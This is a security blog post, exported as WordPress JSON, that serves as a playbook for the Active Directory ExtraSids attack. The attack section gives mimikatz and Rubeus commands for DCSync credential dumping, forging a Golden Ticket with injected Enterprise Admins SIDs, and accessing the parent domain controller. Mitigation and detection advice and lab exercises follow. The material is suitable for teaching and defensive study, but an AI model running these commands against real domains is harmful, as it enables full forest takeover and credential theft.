{"id":296,"date":"2025-02-25T00:00:00","date_gmt":"2025-02-24T23:00:00","guid":{"rendered":"https:\/\/kosokoking.com\/?p=296"},"modified":"2025-02-24T12:06:12","modified_gmt":"2025-02-24T11:06:12","slug":"extrasids-attacks-sid-history-exploitation","status":"publish","type":"post","link":"https:\/\/kosokoking.com\/index.php\/security\/extrasids-attacks-sid-history-exploitation\/","title":{"rendered":"ExtraSids Attacks: SID History Exploitation"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>Overview<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The ExtraSids attack is a technique that allows an attacker who has compromised a child domain to compromise the parent domain within the same <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/plan\/understanding-the-active-directory-logical-model\" target=\"_blank\" rel=\"noopener\" title=\"\">Active Directory Forest<\/a>. A Golden Ticket is forged for the child domain with the parent domain&#8217;s Enterprise Admins SID placed in its SID History; because the trust between a parent and a child domain is not SID filtered, the parent domain&#8217;s domain controllers honour the injected SID. This playbook provides a comprehensive guide for understanding, executing, and defending against this attack.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Key Concepts<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>SID History<\/strong>: An attribute (sIDHistory) used in migration scenarios to retain a user&#8217;s original SID when moved to a new domain, so that access granted to the old SID carries over.<\/li>\n\n\n\n<li><strong>SID Filtering<\/strong>: A protection mechanism that strips SIDs not belonging to the trusted domain from authentication data crossing a trust. It is enabled by default on inter-forest trusts (external and forest trusts) but not on intra-forest trusts such as parent-child, which is why the forest, not the domain, is the security boundary.<\/li>\n\n\n\n<li><strong>Golden Ticket<\/strong>: A forged Kerberos TGT, signed with the KRBTGT account&#8217;s hash, that grants unrestricted access within an Active Directory domain. The ExtraSids variant adds the parent domain&#8217;s Enterprise Admins SID to the ticket&#8217;s SID History field.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Prerequisites<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To perform the ExtraSids attack, the following information is required:<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>KRBTGT hash for the child domain<\/li>\n\n\n\n<li>SID of the child domain<\/li>\n\n\n\n<li>Name of a target user in the child domain (can be 
non-existent)<\/li>\n\n\n\n<li>FQDN of the child domain<\/li>\n\n\n\n<li>SID of the Enterprise Admins group of the root domain<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Attack Execution<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 1: Gather Required Information<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Obtain the KRBTGT account&#8217;s NT hash using DCSync:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz # lsadump::dcsync \/user:CHILD_DOMAIN\\krbtgt<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Get the child domain SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; Get-DomainSID<\/code><\/pre>\n\n\n\n<ol start=\"3\" class=\"wp-block-list\">\n<li>Obtain the Enterprise Admins group SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; Get-DomainGroup -Domain PARENT_DOMAIN -Identity \"Enterprise Admins\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 2: Create Golden Ticket<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using Mimikatz:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz # kerberos::golden \/user:hacker \/domain:CHILD_DOMAIN \/sid:CHILD_DOMAIN_SID \/krbtgt:KRBTGT_HASH \/sids:ENTERPRISE_ADMINS_SID \/ptt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using Rubeus:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Rubeus.exe golden \/rc4:KRBTGT_HASH \/domain:CHILD_DOMAIN \/sid:CHILD_DOMAIN_SID \/sids:ENTERPRISE_ADMINS_SID \/user:hacker \/ptt<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 3: Verify Ticket Creation<\/strong><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; klist<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 4: Exploit Access<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Test access by performing actions such as listing the C: drive of the parent domain&#8217;s DC or 
executing a DCSync attack:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; ls \\\\PARENT_DC\\c$<br><br>mimikatz # lsadump::dcsync \/user:PARENT_DOMAIN\\target_user<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Mitigation Strategies<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Keep SID Filtering enabled on inter-forest trusts; it does not protect parent-child trusts within a forest, so treat the forest (not the domain) as the security boundary and secure every child domain as rigorously as the root<\/li>\n\n\n\n<li>Regularly audit and monitor privileged accounts<\/li>\n\n\n\n<li>Adopt the Enhanced Security Administrative Environment (ESAE) architecture<\/li>\n\n\n\n<li>Restrict directory replication (DCSync) rights to domain controllers, and reset the KRBTGT password twice if its hash may have been exposed, since a Golden Ticket stays valid while the old key is still accepted<\/li>\n\n\n\n<li>Consider implementing a &#8220;Red Forest&#8221; architecture (the informal name for the ESAE approach), which keeps privileged accounts in a separate hardened forest<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Detection Methods<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Monitor for unusual SID History modifications, noting that ExtraSids injects the extra SID into the forged ticket rather than writing the sIDHistory attribute, so ticket-level inspection (authorization data carrying a SID from another domain in the forest) is needed as well<\/li>\n\n\n\n<li>Look for unexpected domain controller impersonation, such as directory replication (DCSync) requests originating from hosts that are not domain controllers<\/li>\n\n\n\n<li>Implement advanced threat detection solutions for Active Directory<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Additional Resources<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/trusts\/\" target=\"_blank\" rel=\"noreferrer noopener\">The Hacker Recipes &#8211; Trusts<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1134.005\/T1134.005.md\" target=\"_blank\" rel=\"noreferrer noopener\">Atomic Red Team &#8211; SID-History Injection<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.semperis.com\/blog\/how-to-defend-against-golden-ticket-attacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">Defending Against Golden Ticket Attacks<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.cayosoft.com\/dcsync\/\" target=\"_blank\" rel=\"noreferrer noopener\">Understanding DCSync Attacks<\/a><\/li>\n\n\n\n<li><a 
href=\"https:\/\/redfoxsec.com\/blog\/domain-trusts-a-comprehensive-exploitation-guide\/\" target=\"_blank\" rel=\"noreferrer noopener\">Comprehensive Domain Trust Exploitation Guide<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.sentinelone.com\/blog\/windows-sid-history-injection-exposure-blog\/\" target=\"_blank\" rel=\"noreferrer noopener\">SID History Injection Exposure<\/a><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Practical Exercises<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Set up a lab environment with a parent and child domain. Compromise the child domain and perform the ExtraSids attack.<\/li>\n\n\n\n<li>Implement SID Filtering on the trust between domains and attempt the attack again to observe mitigation effectiveness.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Remember to use this playbook for educational and authorized testing purposes only. Always obtain proper permissions before conducting security assessments in production environments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For more insightful and engaging write-ups, visit <a href=\"https:\/\/kosokoking.com\/\" target=\"_blank\" rel=\"noopener\" title=\"\">kosokoking.com<\/a> and stay ahead in the world of cybersecurity!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Discover how ExtraSids attacks exploit SID history to compromise parent domains and bypass security with detection and mitigation 
strategies.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[201,384,387,380,385,386,382,383,202,381],"class_list":["post-296","post","type-post","status-publish","format-standard","hentry","category-security","tag-active-directory-security","tag-ad-forest-compromise","tag-cybersecurity-defence","tag-domain-trusts","tag-enterprise-security","tag-extrasids-attack","tag-golden-ticket-attack","tag-kerberos-attacks","tag-privilege-escalation-2","tag-sid-history-exploitation"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/comments?post=296"}],"version-history":[{"count":2,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions"}],"predecessor-version":[{"id":298,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions\/298"}],"wp:attachment":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/media?parent=296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/categories?post=296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/tags?post=296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}